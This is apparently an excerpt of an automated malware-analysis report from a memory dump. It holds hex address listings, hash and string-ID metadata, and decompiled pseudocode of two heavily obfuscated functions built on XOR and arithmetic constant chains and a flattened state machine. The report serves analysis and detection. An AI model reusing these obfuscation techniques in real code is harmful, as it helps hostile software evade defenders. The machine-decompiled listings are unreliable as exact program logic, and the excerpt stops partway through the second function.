                                                                                                                                                                                                                    0x00a77ab8
                                                                                                                                                                                                                    0x00a77abf
                                                                                                                                                                                                                    0x00a77ac6
                                                                                                                                                                                                                    0x00a77ad4
                                                                                                                                                                                                                    0x00a77ad9
                                                                                                                                                                                                                    0x00a77ae0
                                                                                                                                                                                                                    0x00a77ae7
                                                                                                                                                                                                                    0x00a77aee
                                                                                                                                                                                                                    0x00a77af5
                                                                                                                                                                                                                    0x00a77af9
                                                                                                                                                                                                                    0x00a77b00
                                                                                                                                                                                                                    0x00a77b07
                                                                                                                                                                                                                    0x00a77b0b
                                                                                                                                                                                                                    0x00a77b12
                                                                                                                                                                                                                    0x00a77b19
                                                                                                                                                                                                                    0x00a77b20
                                                                                                                                                                                                                    0x00a77b27
                                                                                                                                                                                                                    0x00a77b2e
                                                                                                                                                                                                                    0x00a77b35
                                                                                                                                                                                                                    0x00a77b3c
                                                                                                                                                                                                                    0x00a77b43
                                                                                                                                                                                                                    0x00a77b4a
                                                                                                                                                                                                                    0x00a77b51
                                                                                                                                                                                                                    0x00a77b5b
                                                                                                                                                                                                                    0x00a77b60
                                                                                                                                                                                                                    0x00a77b65
                                                                                                                                                                                                                    0x00a77b6c
                                                                                                                                                                                                                    0x00a77b73
                                                                                                                                                                                                                    0x00a77b7a
                                                                                                                                                                                                                    0x00a77b81
                                                                                                                                                                                                                    0x00a77b88
                                                                                                                                                                                                                    0x00a77b8f
                                                                                                                                                                                                                    0x00a77b96
                                                                                                                                                                                                                    0x00a77ba0
                                                                                                                                                                                                                    0x00a77ba3
                                                                                                                                                                                                                    0x00a77ba6
                                                                                                                                                                                                                    0x00a77bad
                                                                                                                                                                                                                    0x00a77bb8
                                                                                                                                                                                                                    0x00a77bbe
                                                                                                                                                                                                                    0x00a77bc2
                                                                                                                                                                                                                    0x00a77bc9
                                                                                                                                                                                                                    0x00a77bd0
                                                                                                                                                                                                                    0x00a77bd7
                                                                                                                                                                                                                    0x00a77bdb
                                                                                                                                                                                                                    0x00a77be2
                                                                                                                                                                                                                    0x00a77be6
                                                                                                                                                                                                                    0x00a77bed
                                                                                                                                                                                                                    0x00a77bf4
                                                                                                                                                                                                                    0x00a77bf8
                                                                                                                                                                                                                    0x00a77bff
                                                                                                                                                                                                                    0x00a77c06
                                                                                                                                                                                                                    0x00a77c0d
                                                                                                                                                                                                                    0x00a77c10
                                                                                                                                                                                                                    0x00a77c13
                                                                                                                                                                                                                    0x00a77c19
                                                                                                                                                                                                                    0x00a77c1c
                                                                                                                                                                                                                    0x00a77c1d
                                                                                                                                                                                                                    0x00a77c3c
                                                                                                                                                                                                                    0x00a77c56
                                                                                                                                                                                                                    0x00a77c6f
                                                                                                                                                                                                                    0x00a77c85
                                                                                                                                                                                                                    0x00a77c8d
                                                                                                                                                                                                                    0x00a77c96
                                                                                                                                                                                                                    0x00a77c9f
                                                                                                                                                                                                                    0x00a77cb0
                                                                                                                                                                                                                    0x00a77cc1
                                                                                                                                                                                                                    0x00a77ccb
                                                                                                                                                                                                                    0x00a77cd5

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.845522080.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: :]w$l@$l%w$P$}b
                                                                                                                                                                                                                    • API String ID: 0-3491718081
                                                                                                                                                                                                                    • Opcode ID: 24bafcc369d8ebc0f9bd020d8feeedec5f3cf4132292350893af083d7e570aab
                                                                                                                                                                                                                    • Instruction ID: 5ee0144f99a4ecd05721db6d6f5ed794232436a1b07b07927f6eef53e0118f1c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 24bafcc369d8ebc0f9bd020d8feeedec5f3cf4132292350893af083d7e570aab
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EDC1DD7250028DDBCF59CF61D98A9CE3BA1FB48348F518119FD1A9A260D3B5CA99CF80
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 90%
                                                                                                                                                                                                                    			E00A6ED92(void* __ecx) {
                                                                                                                                                                                                                    				signed int _v4;
                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                                                                    				signed int _v20;
                                                                                                                                                                                                                    				signed int _v24;
                                                                                                                                                                                                                    				signed int _v28;
                                                                                                                                                                                                                    				signed int _v32;
                                                                                                                                                                                                                    				signed int _v36;
                                                                                                                                                                                                                    				signed int _v40;
                                                                                                                                                                                                                    				signed int _v44;
                                                                                                                                                                                                                    				signed int _v48;
                                                                                                                                                                                                                    				signed int _v52;
                                                                                                                                                                                                                    				signed int _v56;
                                                                                                                                                                                                                    				signed int _v60;
                                                                                                                                                                                                                    				unsigned int _v64;
                                                                                                                                                                                                                    				signed int _v68;
                                                                                                                                                                                                                    				unsigned int _v72;
                                                                                                                                                                                                                    				unsigned int _v76;
                                                                                                                                                                                                                    				void* _t190;
                                                                                                                                                                                                                    				void* _t191;
                                                                                                                                                                                                                    				void* _t195;
                                                                                                                                                                                                                    				void* _t199;
                                                                                                                                                                                                                    				void* _t205;
                                                                                                                                                                                                                    				void* _t209;
                                                                                                                                                                                                                    				void* _t210;
                                                                                                                                                                                                                    				signed int _t212;
                                                                                                                                                                                                                    				signed int _t213;
                                                                                                                                                                                                                    				signed int _t214;
                                                                                                                                                                                                                    				void* _t226;
                                                                                                                                                                                                                    				void* _t227;
                                                                                                                                                                                                                    				unsigned int* _t229;
                                                                                                                                                                                                                    				void* _t231;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_t229 =  &_v76;
                                                                                                                                                                                                                    				_v8 = 0xae4264;
                                                                                                                                                                                                                    				_v8 = _v8 * 5;
                                                                                                                                                                                                                    				_t210 = __ecx;
                                                                                                                                                                                                                    				_v8 = _v8 ^ 0x036e16f3;
                                                                                                                                                                                                                    				_t226 = 0;
                                                                                                                                                                                                                    				_v60 = 0x9ee505;
                                                                                                                                                                                                                    				_v60 = _v60 | 0xb958f65c;
                                                                                                                                                                                                                    				_t227 = 0x8851938;
                                                                                                                                                                                                                    				_v60 = _v60 ^ 0x9a1567fd;
                                                                                                                                                                                                                    				_t212 = 0x51;
                                                                                                                                                                                                                    				_v60 = _v60 / _t212;
                                                                                                                                                                                                                    				_v60 = _v60 ^ 0x007a74ed;
                                                                                                                                                                                                                    				_v52 = 0xcbc6e5;
                                                                                                                                                                                                                    				_v52 = _v52 + 0xffffd8d8;
                                                                                                                                                                                                                    				_v52 = _v52 + 0xffff2b56;
                                                                                                                                                                                                                    				_v52 = _v52 + 0xffffc96a;
                                                                                                                                                                                                                    				_v52 = _v52 ^ 0x00c88bec;
                                                                                                                                                                                                                    				_v4 = 0xb9b47;
                                                                                                                                                                                                                    				_v4 = _v4 ^ 0x18d56e56;
                                                                                                                                                                                                                    				_v4 = _v4 ^ 0x18d09265;
                                                                                                                                                                                                                    				_v56 = 0x92863;
                                                                                                                                                                                                                    				_t213 = 0x36;
                                                                                                                                                                                                                    				_v56 = _v56 * 0x65;
                                                                                                                                                                                                                    				_v56 = _v56 >> 0xe;
                                                                                                                                                                                                                    				_v56 = _v56 / _t213;
                                                                                                                                                                                                                    				_v56 = _v56 ^ 0x000c6a18;
                                                                                                                                                                                                                    				_v28 = 0xbc26f0;
                                                                                                                                                                                                                    				_v28 = _v28 << 0xd;
                                                                                                                                                                                                                    				_v28 = _v28 | 0x1d31d063;
                                                                                                                                                                                                                    				_v28 = _v28 ^ 0x9df0f118;
                                                                                                                                                                                                                    				_v12 = 0x4fe6a3;
                                                                                                                                                                                                                    				_v12 = _v12 << 6;
                                                                                                                                                                                                                    				_v12 = _v12 ^ 0x13fc5014;
                                                                                                                                                                                                                    				_v32 = 0xdad94d;
                                                                                                                                                                                                                    				_t214 = 0x6e;
                                                                                                                                                                                                                    				_v32 = _v32 / _t214;
                                                                                                                                                                                                                    				_v32 = _v32 + 0xffff0d08;
                                                                                                                                                                                                                    				_v32 = _v32 ^ 0x000f7c1b;
                                                                                                                                                                                                                    				_v64 = 0x37a5e2;
                                                                                                                                                                                                                    				_v64 = _v64 + 0xffff669d;
                                                                                                                                                                                                                    				_v64 = _v64 >> 7;
                                                                                                                                                                                                                    				_v64 = _v64 + 0xffff31bc;
                                                                                                                                                                                                                    				_v64 = _v64 ^ 0xfff593af;
                                                                                                                                                                                                                    				_v68 = 0x78f598;
                                                                                                                                                                                                                    				_v68 = _v68 ^ 0x3bac5de6;
                                                                                                                                                                                                                    				_v68 = _v68 * 0x31;
                                                                                                                                                                                                                    				_v68 = _v68 << 2;
                                                                                                                                                                                                                    				_v68 = _v68 ^ 0xced304fb;
                                                                                                                                                                                                                    				_v16 = 0xc2630d;
                                                                                                                                                                                                                    				_v16 = _v16 + 0xffffa41e;
                                                                                                                                                                                                                    				_v16 = _v16 ^ 0x00c2a955;
                                                                                                                                                                                                                    				_v72 = 0x306732;
                                                                                                                                                                                                                    				_v72 = _v72 | 0xeb551487;
                                                                                                                                                                                                                    				_v72 = _v72 * 0x53;
                                                                                                                                                                                                                    				_v72 = _v72 >> 4;
                                                                                                                                                                                                                    				_v72 = _v72 ^ 0x0572b72f;
                                                                                                                                                                                                                    				_v44 = 0x800740;
                                                                                                                                                                                                                    				_v44 = _v44 + 0xffffc06f;
                                                                                                                                                                                                                    				_v44 = _v44 * 0x7f;
                                                                                                                                                                                                                    				_v44 = _v44 ^ 0x3f6cd090;
                                                                                                                                                                                                                    				_v76 = 0x572b96;
                                                                                                                                                                                                                    				_v76 = _v76 >> 7;
                                                                                                                                                                                                                    				_v76 = _v76 + 0xe337;
                                                                                                                                                                                                                    				_v76 = _v76 + 0x50e3;
                                                                                                                                                                                                                    				_v76 = _v76 ^ 0x000e5f9c;
                                                                                                                                                                                                                    				_v36 = 0xc47249;
                                                                                                                                                                                                                    				_v36 = _v36 + 0x7021;
                                                                                                                                                                                                                    				_v36 = _v36 + 0xffffe6ce;
                                                                                                                                                                                                                    				_v36 = _v36 ^ 0x00c2f92c;
                                                                                                                                                                                                                    				_v20 = 0xccff91;
                                                                                                                                                                                                                    				_v20 = _v20 * 0x26;
                                                                                                                                                                                                                    				_v20 = _v20 ^ 0x1e6afb37;
                                                                                                                                                                                                                    				_v40 = 0xcb07e4;
                                                                                                                                                                                                                    				_v40 = _v40 << 5;
                                                                                                                                                                                                                    				_v40 = _v40 * 0x11;
                                                                                                                                                                                                                    				_v40 = _v40 ^ 0xaf749f81;
                                                                                                                                                                                                                    				_v48 = 0x99a326;
                                                                                                                                                                                                                    				_v48 = _v48 + 0x9b44;
                                                                                                                                                                                                                    				_v48 = _v48 >> 4;
                                                                                                                                                                                                                    				_v48 = _v48 | 0x6508ed5d;
                                                                                                                                                                                                                    				_v48 = _v48 ^ 0x650f541e;
                                                                                                                                                                                                                    				_v24 = 0x678125;
                                                                                                                                                                                                                    				_v24 = _v24 * 0x39;
                                                                                                                                                                                                                    				_v24 = _v24 >> 0xb;
                                                                                                                                                                                                                    				_v24 = _v24 ^ 0x0002b67a;
                                                                                                                                                                                                                    				goto L1;
                                                                                                                                                                                                                    				do {
                                                                                                                                                                                                                    					while(1) {
                                                                                                                                                                                                                    						L1:
                                                                                                                                                                                                                    						_t231 = _t227 - 0x8851938;
                                                                                                                                                                                                                    						if(_t231 > 0) {
                                                                                                                                                                                                                    							break;
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						if(_t231 == 0) {
                                                                                                                                                                                                                    							_t227 = 0xccea80f;
                                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                    							if(_t227 == 0x1c70b00) {
                                                                                                                                                                                                                    								_push(_t214);
                                                                                                                                                                                                                    								_push(_t214);
                                                                                                                                                                                                                    								_t195 = E00A7102D();
                                                                                                                                                                                                                    								_t229 =  &(_t229[2]);
                                                                                                                                                                                                                    								_t227 = 0x634e544;
                                                                                                                                                                                                                    								_t226 = _t226 + _t195;
                                                                                                                                                                                                                    								continue;
                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                    								if(_t227 == 0x2117e00) {
                                                                                                                                                                                                                    									_push(_t214);
                                                                                                                                                                                                                    									_push(_t214);
                                                                                                                                                                                                                    									_t199 = E00A7102D();
                                                                                                                                                                                                                    									_t229 =  &(_t229[2]);
                                                                                                                                                                                                                    									_t227 = 0x62bfc36;
                                                                                                                                                                                                                    									_t226 = _t226 + _t199;
                                                                                                                                                                                                                    									continue;
                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                    									if(_t227 == 0x62bfc36) {
                                                                                                                                                                                                                    										_t226 = _t226 + E00A76CD3(_v48, _t210 + 0x3c, _v24);
                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                    										if(_t227 != 0x634e544) {
                                                                                                                                                                                                                    											goto L17;
                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                    											_push(_t214);
                                                                                                                                                                                                                    											_push(_t214);
                                                                                                                                                                                                                    											_t205 = E00A7102D();
                                                                                                                                                                                                                    											_t229 =  &(_t229[2]);
                                                                                                                                                                                                                    											_t227 = 0x2117e00;
                                                                                                                                                                                                                    											_t226 = _t226 + _t205;
                                                                                                                                                                                                                    											continue;
                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						L20:
                                                                                                                                                                                                                    						return _t226;
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    					if(_t227 == 0x8d23f10) {
                                                                                                                                                                                                                    						_push(_t214);
                                                                                                                                                                                                                    						_push(_t214);
                                                                                                                                                                                                                    						_t190 = E00A7102D();
                                                                                                                                                                                                                    						_t229 =  &(_t229[2]);
                                                                                                                                                                                                                    						_t227 = 0xe7a5cea;
                                                                                                                                                                                                                    						_t226 = _t226 + _t190;
                                                                                                                                                                                                                    						goto L17;
                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                    						if(_t227 == 0xccea80f) {
                                                                                                                                                                                                                    							_t191 = E00A76CD3(_v8, _t210 + 0x1c, _v60);
                                                                                                                                                                                                                    							_pop(_t214);
                                                                                                                                                                                                                    							_t226 = _t226 + _t191;
                                                                                                                                                                                                                    							_t227 = 0x8d23f10;
                                                                                                                                                                                                                    							goto L1;
                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                    							if(_t227 != 0xe7a5cea) {
                                                                                                                                                                                                                    								goto L17;
                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                    								_push(_t214);
                                                                                                                                                                                                                    								_push(_t214);
                                                                                                                                                                                                                    								_t209 = E00A7102D();
                                                                                                                                                                                                                    								_t229 =  &(_t229[2]);
                                                                                                                                                                                                                    								_t227 = 0x1c70b00;
                                                                                                                                                                                                                    								_t226 = _t226 + _t209;
                                                                                                                                                                                                                    								goto L1;
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    					goto L20;
                                                                                                                                                                                                                    					L17:
                                                                                                                                                                                                                    				} while (_t227 != 0xd39f627);
                                                                                                                                                                                                                    				goto L20;
                                                                                                                                                                                                                    			}




































                                                                                                                                                                                                                    0x00a6ed92
                                                                                                                                                                                                                    0x00a6ed95
                                                                                                                                                                                                                    0x00a6eda8
                                                                                                                                                                                                                    0x00a6edac
                                                                                                                                                                                                                    0x00a6edae
                                                                                                                                                                                                                    0x00a6edb6
                                                                                                                                                                                                                    0x00a6edb8
                                                                                                                                                                                                                    0x00a6edc5
                                                                                                                                                                                                                    0x00a6edcd
                                                                                                                                                                                                                    0x00a6edcf
                                                                                                                                                                                                                    0x00a6eddd
                                                                                                                                                                                                                    0x00a6ede2
                                                                                                                                                                                                                    0x00a6ede8
                                                                                                                                                                                                                    0x00a6edf0
                                                                                                                                                                                                                    0x00a6edf8
                                                                                                                                                                                                                    0x00a6ee00
                                                                                                                                                                                                                    0x00a6ee08
                                                                                                                                                                                                                    0x00a6ee10
                                                                                                                                                                                                                    0x00a6ee18
                                                                                                                                                                                                                    0x00a6ee20
                                                                                                                                                                                                                    0x00a6ee28
                                                                                                                                                                                                                    0x00a6ee30
                                                                                                                                                                                                                    0x00a6ee3d
                                                                                                                                                                                                                    0x00a6ee40
                                                                                                                                                                                                                    0x00a6ee44
                                                                                                                                                                                                                    0x00a6ee51
                                                                                                                                                                                                                    0x00a6ee55
                                                                                                                                                                                                                    0x00a6ee5d
                                                                                                                                                                                                                    0x00a6ee65
                                                                                                                                                                                                                    0x00a6ee6a
                                                                                                                                                                                                                    0x00a6ee72
                                                                                                                                                                                                                    0x00a6ee7a
                                                                                                                                                                                                                    0x00a6ee82
                                                                                                                                                                                                                    0x00a6ee87
                                                                                                                                                                                                                    0x00a6ee8f
                                                                                                                                                                                                                    0x00a6ee9b
                                                                                                                                                                                                                    0x00a6ee9e
                                                                                                                                                                                                                    0x00a6eea2
                                                                                                                                                                                                                    0x00a6eeaa
                                                                                                                                                                                                                    0x00a6eeb2
                                                                                                                                                                                                                    0x00a6eeba
                                                                                                                                                                                                                    0x00a6eec2
                                                                                                                                                                                                                    0x00a6eec7
                                                                                                                                                                                                                    0x00a6eecf
                                                                                                                                                                                                                    0x00a6eed7
                                                                                                                                                                                                                    0x00a6eedf
                                                                                                                                                                                                                    0x00a6eeec
                                                                                                                                                                                                                    0x00a6eef0
                                                                                                                                                                                                                    0x00a6eef5
                                                                                                                                                                                                                    0x00a6eefd
                                                                                                                                                                                                                    0x00a6ef05
                                                                                                                                                                                                                    0x00a6ef0d
                                                                                                                                                                                                                    0x00a6ef15
                                                                                                                                                                                                                    0x00a6ef1d
                                                                                                                                                                                                                    0x00a6ef2a
                                                                                                                                                                                                                    0x00a6ef2e
                                                                                                                                                                                                                    0x00a6ef33
                                                                                                                                                                                                                    0x00a6ef3b
                                                                                                                                                                                                                    0x00a6ef43
                                                                                                                                                                                                                    0x00a6ef50
                                                                                                                                                                                                                    0x00a6ef54
                                                                                                                                                                                                                    0x00a6ef5c
                                                                                                                                                                                                                    0x00a6ef64
                                                                                                                                                                                                                    0x00a6ef69
                                                                                                                                                                                                                    0x00a6ef71
                                                                                                                                                                                                                    0x00a6ef79
                                                                                                                                                                                                                    0x00a6ef81
                                                                                                                                                                                                                    0x00a6ef89
                                                                                                                                                                                                                    0x00a6ef91
                                                                                                                                                                                                                    0x00a6ef99
                                                                                                                                                                                                                    0x00a6efa1
                                                                                                                                                                                                                    0x00a6efae
                                                                                                                                                                                                                    0x00a6efb2
                                                                                                                                                                                                                    0x00a6efba
                                                                                                                                                                                                                    0x00a6efc2
                                                                                                                                                                                                                    0x00a6efcc
                                                                                                                                                                                                                    0x00a6efd0
                                                                                                                                                                                                                    0x00a6efd8
                                                                                                                                                                                                                    0x00a6efe0
                                                                                                                                                                                                                    0x00a6efe8
                                                                                                                                                                                                                    0x00a6efed
                                                                                                                                                                                                                    0x00a6eff5
                                                                                                                                                                                                                    0x00a6effd
                                                                                                                                                                                                                    0x00a6f00a
                                                                                                                                                                                                                    0x00a6f00e
                                                                                                                                                                                                                    0x00a6f013
                                                                                                                                                                                                                    0x00a6f013
                                                                                                                                                                                                                    0x00a6f01b
                                                                                                                                                                                                                    0x00a6f01b
                                                                                                                                                                                                                    0x00a6f01b
                                                                                                                                                                                                                    0x00a6f01b
                                                                                                                                                                                                                    0x00a6f01d
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6f023
                                                                                                                                                                                                                    0x00a6f0b1
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6f029
                                                                                                                                                                                                                    0x00a6f02f
                                                                                                                                                                                                                    0x00a6f09b
                                                                                                                                                                                                                    0x00a6f09c
                                                                                                                                                                                                                    0x00a6f09d
                                                                                                                                                                                                                    0x00a6f0a2
                                                                                                                                                                                                                    0x00a6f0a5
                                                                                                                                                                                                                    0x00a6f0aa
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6f031
                                                                                                                                                                                                                    0x00a6f037
                                                                                                                                                                                                                    0x00a6f07c
                                                                                                                                                                                                                    0x00a6f07d
                                                                                                                                                                                                                    0x00a6f07e
                                                                                                                                                                                                                    0x00a6f083
                                                                                                                                                                                                                    0x00a6f086
                                                                                                                                                                                                                    0x00a6f08b
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6f039
                                                                                                                                                                                                                    0x00a6f03f
                                                                                                                                                                                                                    0x00a6f14e
                                                                                                                                                                                                                    0x00a6f045
                                                                                                                                                                                                                    0x00a6f04b
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6f051
                                                                                                                                                                                                                    0x00a6f05d
                                                                                                                                                                                                                    0x00a6f05e
                                                                                                                                                                                                                    0x00a6f05f
                                                                                                                                                                                                                    0x00a6f064
                                                                                                                                                                                                                    0x00a6f067
                                                                                                                                                                                                                    0x00a6f06c
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6f06c
                                                                                                                                                                                                                    0x00a6f04b
                                                                                                                                                                                                                    0x00a6f03f
                                                                                                                                                                                                                    0x00a6f037
                                                                                                                                                                                                                    0x00a6f02f
                                                                                                                                                                                                                    0x00a6f150
                                                                                                                                                                                                                    0x00a6f159
                                                                                                                                                                                                                    0x00a6f159
                                                                                                                                                                                                                    0x00a6f0c1
                                                                                                                                                                                                                    0x00a6f11e
                                                                                                                                                                                                                    0x00a6f11f
                                                                                                                                                                                                                    0x00a6f120
                                                                                                                                                                                                                    0x00a6f125
                                                                                                                                                                                                                    0x00a6f128
                                                                                                                                                                                                                    0x00a6f12d
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6f0c3
                                                                                                                                                                                                                    0x00a6f0c9
                                                                                                                                                                                                                    0x00a6f100
                                                                                                                                                                                                                    0x00a6f105
                                                                                                                                                                                                                    0x00a6f106
                                                                                                                                                                                                                    0x00a6f108
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6f0cb
                                                                                                                                                                                                                    0x00a6f0d1
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6f0d3
                                                                                                                                                                                                                    0x00a6f0df
                                                                                                                                                                                                                    0x00a6f0e0
                                                                                                                                                                                                                    0x00a6f0e1
                                                                                                                                                                                                                    0x00a6f0e6
                                                                                                                                                                                                                    0x00a6f0e9
                                                                                                                                                                                                                    0x00a6f0ee
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6f0ee
                                                                                                                                                                                                                    0x00a6f0d1
                                                                                                                                                                                                                    0x00a6f0c9
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6f12f
                                                                                                                                                                                                                    0x00a6f12f
                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.845522080.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: !p$2g0$c($P$tz
                                                                                                                                                                                                                    • API String ID: 0-1464696413
                                                                                                                                                                                                                    • Opcode ID: 6c11e0eb564e9532cc031f7cd3cc04c4915369c0f458d605ee282596a0f34aa1
                                                                                                                                                                                                                    • Instruction ID: f46f46e02880fa54bd91bc15cc86c5fa7cf477e89e9eb87d52e3337fe433fdd9
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6c11e0eb564e9532cc031f7cd3cc04c4915369c0f458d605ee282596a0f34aa1
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C69146B28093419FC354CF25E98940BFBF0BBD5758F118A2DF59996260E3B5CA498F83
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 96%
                                                                                                                                                                                                                    			E00A6AD68(void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                                                    				char _v28;
                                                                                                                                                                                                                    				signed int _v32;
                                                                                                                                                                                                                    				signed int _v36;
                                                                                                                                                                                                                    				signed int _v40;
                                                                                                                                                                                                                    				signed int _v44;
                                                                                                                                                                                                                    				signed int _v48;
                                                                                                                                                                                                                    				signed int _v52;
                                                                                                                                                                                                                    				signed int _v56;
                                                                                                                                                                                                                    				signed int _v60;
                                                                                                                                                                                                                    				signed int _v64;
                                                                                                                                                                                                                    				signed int _v68;
                                                                                                                                                                                                                    				signed int _v72;
                                                                                                                                                                                                                    				signed int _v76;
                                                                                                                                                                                                                    				signed int _v80;
                                                                                                                                                                                                                    				signed int _v84;
                                                                                                                                                                                                                    				signed int _v88;
                                                                                                                                                                                                                    				void* __ecx;
                                                                                                                                                                                                                    				void* _t138;
                                                                                                                                                                                                                    				void* _t153;
                                                                                                                                                                                                                    				void* _t169;
                                                                                                                                                                                                                    				void* _t171;
                                                                                                                                                                                                                    				void* _t201;
                                                                                                                                                                                                                    				signed int _t203;
                                                                                                                                                                                                                    				signed int _t204;
                                                                                                                                                                                                                    				signed int _t205;
                                                                                                                                                                                                                    				void* _t207;
                                                                                                                                                                                                                    				void* _t208;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_t202 = _a4;
                                                                                                                                                                                                                    				_t169 = __edx;
                                                                                                                                                                                                                    				_push(_a8);
                                                                                                                                                                                                                    				_push(_a4);
                                                                                                                                                                                                                    				_push(__edx);
                                                                                                                                                                                                                    				E00A7C6D8(_t138);
                                                                                                                                                                                                                    				_v64 = 0xa7ef44;
                                                                                                                                                                                                                    				_t208 = _t207 + 0x10;
                                                                                                                                                                                                                    				_t201 = 0;
                                                                                                                                                                                                                    				_t171 = 0xbf6a83e;
                                                                                                                                                                                                                    				_t203 = 0x2b;
                                                                                                                                                                                                                    				_v64 = _v64 * 0x55;
                                                                                                                                                                                                                    				_v64 = _v64 << 4;
                                                                                                                                                                                                                    				_v64 = _v64 ^ 0x7c29fa1f;
                                                                                                                                                                                                                    				_v68 = 0x97f2dc;
                                                                                                                                                                                                                    				_v68 = _v68 ^ 0x4742966b;
                                                                                                                                                                                                                    				_v68 = _v68 | 0x2f8c7e06;
                                                                                                                                                                                                                    				_v68 = _v68 ^ 0x6fd2503d;
                                                                                                                                                                                                                    				_v72 = 0xde4064;
                                                                                                                                                                                                                    				_v72 = _v72 * 0x73;
                                                                                                                                                                                                                    				_v72 = _v72 * 0x3a;
                                                                                                                                                                                                                    				_v72 = _v72 ^ 0x9eb26868;
                                                                                                                                                                                                                    				_v76 = 0x757643;
                                                                                                                                                                                                                    				_v76 = _v76 ^ 0xb6c50a2e;
                                                                                                                                                                                                                    				_v76 = _v76 / _t203;
                                                                                                                                                                                                                    				_v76 = _v76 ^ 0x043d6533;
                                                                                                                                                                                                                    				_v36 = 0x44b0ed;
                                                                                                                                                                                                                    				_t204 = 0x4c;
                                                                                                                                                                                                                    				_v36 = _v36 / _t204;
                                                                                                                                                                                                                    				_v36 = _v36 ^ 0x000fa040;
                                                                                                                                                                                                                    				_v40 = 0x1276f7;
                                                                                                                                                                                                                    				_v40 = _v40 | 0x76ac3775;
                                                                                                                                                                                                                    				_v40 = _v40 ^ 0x76b885d0;
                                                                                                                                                                                                                    				_v88 = 0xaa8970;
                                                                                                                                                                                                                    				_t205 = 0x63;
                                                                                                                                                                                                                    				_v88 = _v88 / _t205;
                                                                                                                                                                                                                    				_v88 = _v88 * 0x73;
                                                                                                                                                                                                                    				_v88 = _v88 + 0x5b30;
                                                                                                                                                                                                                    				_v88 = _v88 ^ 0x00cf2660;
                                                                                                                                                                                                                    				_v80 = 0x84da3a;
                                                                                                                                                                                                                    				_v80 = _v80 >> 0xb;
                                                                                                                                                                                                                    				_v80 = _v80 << 0xe;
                                                                                                                                                                                                                    				_v80 = _v80 ^ 0x042fe813;
                                                                                                                                                                                                                    				_v48 = 0x55ea37;
                                                                                                                                                                                                                    				_v48 = _v48 + 0xffff794b;
                                                                                                                                                                                                                    				_v48 = _v48 ^ 0x005c9c70;
                                                                                                                                                                                                                    				_v52 = 0x4a6ce5;
                                                                                                                                                                                                                    				_t75 =  &_v52; // 0x4a6ce5
                                                                                                                                                                                                                    				_v52 =  *_t75 * 0x65;
                                                                                                                                                                                                                    				_v52 = _v52 ^ 0x1d5b78f8;
                                                                                                                                                                                                                    				_v84 = 0xeb940c;
                                                                                                                                                                                                                    				_v84 = _v84 + 0x7b99;
                                                                                                                                                                                                                    				_v84 = _v84 >> 9;
                                                                                                                                                                                                                    				_v84 = _v84 ^ 0xcc6d15c1;
                                                                                                                                                                                                                    				_v84 = _v84 ^ 0xcc6efb3b;
                                                                                                                                                                                                                    				_v44 = 0xd28f1b;
                                                                                                                                                                                                                    				_v44 = _v44 ^ 0xf0b9e8bb;
                                                                                                                                                                                                                    				_v44 = _v44 ^ 0xf062c5e0;
                                                                                                                                                                                                                    				_v56 = 0x48f969;
                                                                                                                                                                                                                    				_v56 = _v56 * 0x72;
                                                                                                                                                                                                                    				_v56 = _v56 + 0xe463;
                                                                                                                                                                                                                    				_v56 = _v56 ^ 0x207ef1aa;
                                                                                                                                                                                                                    				_v60 = 0x8e3f25;
                                                                                                                                                                                                                    				_v60 = _v60 + 0xcec9;
                                                                                                                                                                                                                    				_v60 = _v60 >> 0xc;
